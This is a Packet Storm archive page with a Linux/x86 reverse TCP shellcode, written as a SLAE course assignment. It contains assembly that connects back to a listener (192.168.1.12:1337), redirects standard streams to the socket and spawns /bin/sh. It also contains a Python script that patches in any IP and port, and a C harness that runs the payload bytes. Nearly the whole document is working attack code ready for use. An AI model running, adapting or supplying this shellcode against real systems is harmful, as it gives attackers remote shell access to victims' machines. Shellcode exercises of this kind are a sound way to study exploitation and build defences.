what you don't know can hurt you

Linux/x86 Reverse TCP Shellcode

Linux/x86 Reverse TCP Shellcode
Posted Dec 31, 2020
Authored by Stylianos Voukatas

114 bytes small Linux/x86 reverse TCP shellcode.

tags | x86, tcp, shellcode
systems | linux
MD5 | 736ab2fee6b1fc77956e403631161630

Linux/x86 Reverse TCP Shellcode

Change Mirror Download
; Title: Linux/x86 - Reverse TCP Shellcode ( 114 bytes )
; Author: Stylianos Voukatas
; Website: https://vostdev.wordpress.com/
; Date: 2020-12-30
; Tested on: Linux ubuntu 5.4.0-42-generic #46~18.04.1-Ubuntu x86_64
;
; Purpose: Assignment 2 for SLAE
; SLAE: http://securitytube-training.com/onlinecourses/securitytube-linux-assembly-expert/

; Student ID: PA-27669
;
; Shellcode-length: 114

;-------------------------------------- ASM --------------------------------------

global _start

section .text
_start:

; set registers to zero
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx

;socket section
mov ax, 0x167 ; set num for socket interrupt
mov bl, 0x02 ; set domain IPv4 Protocol, try also 0x00 for both v4 and v6, also one less instruction
mov cl, 0x01 ; set type
; edx is zero ; set protocol, leave it 0 so it will select on its own based on the type

int 0x80 ; interrupt for socket()


; eax will hold our file descriptor (fd)
mov esi, eax ; store fd

; connect section

; construct the struct sockaddr_in

; prepare eax for ip addr XOR, set a mask
mov eax, 0xffffffff
push edx ; padding 4 bytes
push edx ; padding 4 bytes

; address 192.168.1.12 is in little endian 0xc01a8c0
; we XOR the address using a mask of 0xffffffff and we get 0xf3fe573f
; in order to restore the initial value we need to XOR again with the mask
; this is done to avoid null characters in case our ip addr contain 0
xor eax, 0xf3fe573f
push eax ; address field, set to 192.168.1.12, in little endian format


; same convertion for the port number

mov eax, 0xffffffff
xor ax, 0xc6fa ; port number 1337 after mask applied in little endian
push ax
push word 0x02 ; address family

mov ecx, esp ; save the struct address in stack

mov dl, 0x10 ; size of struct, 16 bytes (padding + address + port + family)

mov ebx, esi ; set fd

xor eax, eax
mov ax, 0x016a ; set num for bind interrupt

int 0x80

; check if connect succeed

test eax, eax ; if not zero then an error occured
jnz exit


; dup2 section
xor ecx, ecx
mov cl, 0x3 ; prepare for loop
xor eax, eax


dup_loop:
; ebx has the fd from the previous call
; duplicate fd for stdin, stdout, stderr
mov al, 0x3f

dec cl
int 0x80

jnz dup_loop


; execve section

xor eax, eax

push eax ; push \0 in stack

; /bin//sh
push 0x68732f2f
push 0x6e69622f

mov ebx, esp

push eax ; push 0 in stack
mov edx, esp

push ebp ; push the address of /bin//sh in stack

mov ecx, esp ; put the address of args in ecx


mov al, 0xb
int 0x80


exit:

xor eax, eax
xor ebx, ebx
mov al, 0x01
mov bl, 0x07 ; just a random number as an exit code :)

int 0x80

;-------------------------------------- ASM --------------------------------------

Script to automaticaly produce the shellcode, set ip and port

;-------------------------------------- Python -----------------------------------
#!/usr/bin/python

from operator import xor


# set ip and port
ip = "192.168.1.12"
#port = "31337"
#ip = '127.0.0.1'
port = '8888'


ip_in_xored_bytes = ''
port_in_xored_bytes = ''


shell_code_1 = "\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x89\\xc6\\xb8\\xff\\xff\\xff\\xff\\x52\\x52\\x35"

#ip

shell_code_2 = "\\x50\\xb8\\xff\\xff\\xff\\xff\\x66\\x35"

#port

shell_code_3 = "\\x66\\x50\\x66\\x6a\\x02\\x89\\xe1\\xb2\\x10\\x89\\xf3\\x31\\xc0\\x66\\xb8\\x6a\\x01\\xcd\\x80\\x85\\xc0\\x75\\x27\\x31\\xc9\\xb1\\x03\\x31\\xc0\\xb0\\x3f\\xfe\\xc9\\xcd\\x80\\x75\\xf8\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x89\\xe2\\x55\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xb3\\x07\\xcd\\x80"

for byte in ip.split("."):
ip_in_xored_bytes += "\\x" + "{:x}".format(xor(int(byte),0xff))


port_in_xored_bytes += "{:04x}".format(xor(int(port),0xffff))
port_xored_formated = "\\x" + port_in_xored_bytes[:2] + "\\x" + port_in_xored_bytes[2:]

print "ip:", ip
print "xored ip: ", ip_in_xored_bytes
print "port:", port
print "xored port: ", port_xored_formated
print ""
shell_code = shell_code_1 + ip_in_xored_bytes + shell_code_2 + port_xored_formated + shell_code_3
print "ShellCode:"
print shell_code

;-------------------------------------- Python ------------------------------------

C program to test the payload
gcc shellcode.c -o shellcode -fno-stack-protector -z execstack -m32

;-------------------------------------- Paylod test -------------------------------
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc6\xb8\xff\xff\xff\xff\x52\x52\x35\x3f\x57\xfe\xf3\x50\xb8\xff\xff\xff\xff\x66\x35\xdd\x47\x66\x50\x66\x6a\x02\x89\xe1\xb2\x10\x89\xf3\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x27\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\x75\xf8\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x55\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xb3\x07\xcd\x80";
main()
{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}
Login or Register to add favorites

File Archive:

April 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    17 Files
  • 2
    Apr 2nd
    2 Files
  • 3
    Apr 3rd
    2 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    15 Files
  • 7
    Apr 7th
    20 Files
  • 8
    Apr 8th
    16 Files
  • 9
    Apr 9th
    5 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    4 Files
  • 13
    Apr 13th
    15 Files
  • 14
    Apr 14th
    27 Files
  • 15
    Apr 15th
    19 Files
  • 16
    Apr 16th
    7 Files
  • 17
    Apr 17th
    1 Files
  • 18
    Apr 18th
    1 Files
  • 19
    Apr 19th
    19 Files
  • 20
    Apr 20th
    18 Files
  • 21
    Apr 21st
    30 Files
  • 22
    Apr 22nd
    18 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close